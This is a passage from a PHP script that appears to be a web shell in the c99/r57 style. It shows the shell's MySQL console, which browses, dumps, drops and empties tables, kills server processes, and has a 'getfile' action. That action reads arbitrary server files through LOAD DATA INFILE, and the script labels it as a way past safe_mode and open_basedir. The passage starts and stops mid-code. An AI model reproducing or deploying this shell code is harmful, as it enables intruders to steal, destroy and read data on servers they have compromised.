     $result = mysql_fetch_array($result, MYSQL_ASSOC);
     $sql_act = "query";
     $sql_tbl_act = "browse";
    }
   }
   if ($sql_act == "query")
   {
    $sql_query = urldecode($sql_query);
    echo "<hr size=\"1\" noshade>";
    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
   }
   if (in_array($sql_act,$acts))
   {
    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
    if ($sql_act == "newtbl")
    {
     echo "<b>";
     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
    }
    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
   }
   elseif ($sql_act == "dump")
   {
    if (empty($submit))
    {
     $diplay = FALSE;
     echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
     $v = join (";",$dmptbls);
     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
     if ($dump_file) {$tmp = $dump_file;}
     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
     echo "</form>";
    }
    else
    {
     $diplay = TRUE;
     $set = array();
     $set["sock"] = $sql_sock;
     $set["db"] = $sql_db;
     $dump_out = "download";
     $set["print"] = 0;
     $set["nl2br"] = 0;
     $set[""] = 0;
     $set["file"] = $dump_file;
     $set["add_drop"] = TRUE;
     $set["onlytabs"] = array();
     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
     $ret = mysql_dump($set);
     if ($sql_dump_download)
     {
      @ob_clean();
      header("Content-type: application/octet-stream");
      header("Content-length: ".strlen($ret));
      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
      echo $ret;
      exit;
     }
     elseif ($sql_dump_savetofile)
     {
      $fp = fopen($sql_dump_file,"w");
      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
      else
      {
       fwrite($fp,$ret);
       fclose($fp);
       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
      }
     }
     else {echo "<b>Dump: nothing to do!</b>";}
    }
   }
   if ($diplay)
   {
    if (!empty($sql_tbl))
    {
     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
     $count_row = mysql_fetch_array($count);
     mysql_free_result($count);
     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
     $tbl_struct_fields = array();
     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
     $perpage = $sql_tbl_le - $sql_tbl_ls;
     if (!is_numeric($perpage)) {$perpage = 10;}
     $numpages = $count_row[0]/$perpage;
     $e = explode(" ",$sql_order);
     if (count($e) == 2)
     {
      if ($e[0] == "d") {$asc_desc = "DESC";}
      else {$asc_desc = "ASC";}
      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
     }
     else {$v = "";}
     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
     $result = mysql_query($query) or print(mysql_smarterror());
     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='structure';document.sql.submit();\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='browse';document.sql.submit();\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_act.value='tbldump';document.sql.thistbl.value='1';document.sql.submit();\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='insert';document.sql.thistbl.value='1';document.sql.submit();\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
     if ($sql_tbl_act == "insert")
     {
      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
      if (!empty($sql_tbl_insert_radio))
      {
 
      }
      else
      {
       echo "<br><br><b>Inserting row into table:</b><br>";
       if (!empty($sql_tbl_insert_q))
       {
        $sql_query = "SELECT * FROM `".$sql_tbl."`";
        $sql_query .= " WHERE".$sql_tbl_insert_q;
        $sql_query .= " LIMIT 1;";
        $sql_query = urldecode($sql_query);
        $sql_tbl_insert_q = urldecode($sql_tbl_insert_q);
        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
        $values = mysql_fetch_assoc($result);
        mysql_free_result($result);
       }
       else {$values = array();}
       echo "<form method=\"POST\"><input type=hidden name='sql_tbl_act' value='insert'><input type=hidden name='sql_tbl_insert_q' value='".urlencode($sql_tbl_insert_q)."'><input type=hidden name='sql_tbl_ls' value='".$sql_tbl_ls."'><input type=hidden name='sql_tbl_le' value='".$sql_tbl_le."'><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
 
       foreach ($tbl_struct_fields as $field)
       {
        $name = $field["Field"];
        if (empty($sql_tbl_insert_q)) {$v = "";}
        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
        $i++;
       }
       echo "</table><br>";
       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
      }
     }
     if ($sql_tbl_act == "browse")
     {
      $sql_tbl_ls = abs($sql_tbl_ls);
      $sql_tbl_le = abs($sql_tbl_le);
      echo "<hr size=\"1\" noshade>";
      $b = 0;
      for($i=0;$i<$numpages;$i++)
      {
       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.thistbl.value='1';document.sql.sql_order.value='".htmlspecialchars($sql_order)."';document.sql.sql_tbl_ls.value='".($i*$perpage)."';document.sql.sql_tbl_le.value='".($i*$perpage+$perpage)."';document.sql.submit();\"><u>";}
       echo $i;
       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
       else {echo "&nbsp;";}
      }
      if ($i == 0) {echo "empty";}
      echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
      echo "<tr>";
      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
      for ($i=0;$i<mysql_num_fields($result);$i++)
      {
       $v = mysql_field_name($result,$i);
       if ($e[0] == "a") {$s = "d"; $m = "asc";}
       else {$s = "a"; $m = "desc";}
       echo "<td>";
       if (empty($e[0])) {$e[0] = "a";}
       if ($e[1] != $v) {$sql_order="";$sql_order=$e[0]." ".$v;echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$sql_order."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>".$v."</b></a>";}
       else {echo "<b>".$v."</b> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$s."%20".$v."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><font color=red>\/</font></a>";}
       echo "</td>";
      }
      echo "<td><font color=\"green\"><b>Action</b></font></td>";
      echo "</tr>";
      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
      {
       echo "<tr>";
       $w = "";
       $i = 0;
       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
       $i = 0;
       foreach ($row as $k=>$v)
       {
        $v = htmlspecialchars($v);
        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
        echo "<td>".$v."</td>";
        $i++;
       }
       echo "<td>";
       echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>DEL</b></a>&nbsp;";
       echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl_act.value='insert';document.sql.sql_tbl_insert_q.value='".urlencode($w)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>EDIT</b></a>&nbsp;";
       echo "</td>";
       echo "</tr>";
      }
      mysql_free_result($result);
      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
      echo "<option value=\"\">With selected:</option>";
      echo "<option value=\"deleterow\">Delete</option>";
      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
     }
    }
    else
    {
     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
     if (!$result) {echo mysql_smarterror();}
     else
     {
      echo "<br><form method=\"POST\"><input name='act' type='hidden' value='sql'><input name='sql_login' type='hidden' value='".$sql_login."'><input name='sql_server' type='hidden' value='".$sql_server."'><input name='sql_port' type='hidden' value='".$sql_port."'><input name='sql_db' type='hidden' value='".$sql_db."'><input name='sql_passwd' type='hidden' value='".$sql_passwd."'><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
      $i = 0;
      $tsize = $trows = 0;
      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
      {
       $tsize += $row["Data_length"];
       $trows += $row["Rows"];
       $size = view_size($row["Data_length"]);
       echo "<tr>";
       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
 
       echo "<td>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($row["Name"])."';document.sql.submit();\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
       echo "<td>".$row["Rows"]."</td>";
       echo "<td>".$row["Type"]."</td>";
       echo "<td>".$row["Create_time"]."</td>";
       echo "<td>".$row["Update_time"]."</td>";
       echo "<td>".$size."</td>";
 
       echo "<td>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>EMPT</b></a>&nbsp;&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DROP TABLE `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>DROP</b></a>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_tbl.value='".$row["Name"]."';document.sql.sql_tbl_act.value='insert';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>INS</b></a>&nbsp;</td>";
       echo "</tr>";
       $i++;
      }
      echo "<tr bgcolor=\"000000\">";
      echo "<td><center><b>»</b></center></td>";
      echo "<td><center><b>".$i." table(s)</b></center></td>";
      echo "<td><b>".$trows."</b></td>";
      echo "<td>".$row[1]."</td>";
      echo "<td>".$row[10]."</td>";
      echo "<td>".$row[11]."</td>";
      echo "<td><b>".view_size($tsize)."</b></td>";
      echo "<td></td>";
      echo "</tr>";
      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
      echo "<option value=\"\">With selected:</option>";
      echo "<option value=\"tbldrop\">Drop</option>";
      echo "<option value=\"tblempty\">Empty</option>";
      echo "<option value=\"tbldump\">Dump</option>";
      echo "<option value=\"tblcheck\">Check table</option>";
      echo "<option value=\"tbloptimize\">Optimize table</option>";
      echo "<option value=\"tblrepair\">Repair table</option>";
      echo "<option value=\"tblanalyze\">Analyze table</option>";
      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
      mysql_free_result($result);
     }
    }
   }
   }
  }
  else
  {
   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
   if (!empty($sql_act))
   {
    echo "<hr size=\"1\" noshade>";
    if ($sql_act == "newdb")
    {
     echo "<b>";
     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
    }
    if ($sql_act == "serverstatus")
    {
     $result = mysql_query("SHOW STATUS", $sql_sock);
     echo "<center><b>Server-status variables:</b><br><br>";
     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
     echo "</table></center>";
     mysql_free_result($result);
    }
    if ($sql_act == "servervars")
    {
     $result = mysql_query("SHOW VARIABLES", $sql_sock);
     echo "<center><b>Server variables:</b><br><br>";
     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
     echo "</table>";
     mysql_free_result($result);
    }
    if ($sql_act == "processes")
    {
     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
     echo "<center><b>Processes:</b><br><br>";
     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.kill.value='".$row[0]."';document.sql.submit();\"><u>Kill</u></a></td></tr>";}
     echo "</table>";
     mysql_free_result($result);
    }
    if ($sql_act == "getfile")
    {
     $tmpdb = $sql_login."_tmpdb";
     $select = mysql_select_db($tmpdb);
     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
     if ($select)
     {
      $created = FALSE;
      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
      $result = mysql_query("SELECT * FROM tmp_file;");
      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
      else
      {
       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
       $f = "";
